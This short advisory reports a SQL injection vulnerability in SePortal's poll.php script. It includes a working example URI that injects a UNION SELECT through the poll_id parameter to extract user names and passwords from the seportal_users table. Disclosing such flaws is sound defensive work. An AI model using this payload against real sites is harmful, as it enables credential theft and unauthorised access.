SePortal 'poll.php' SQL Injection Vulnerability

SePortal 'poll.php' SQL Injection Vulnerability

An attacker can exploit this issue through a web browser.

The following example URI is available.

http://www.example.com/poll.php?poll_id=1'+union+select+1,convert(concat_ws(0x3a3a,user_name,user_password)+using+latin1),1,1,1,1,1,1,1,1+from+seportal_users+limit+1,1/*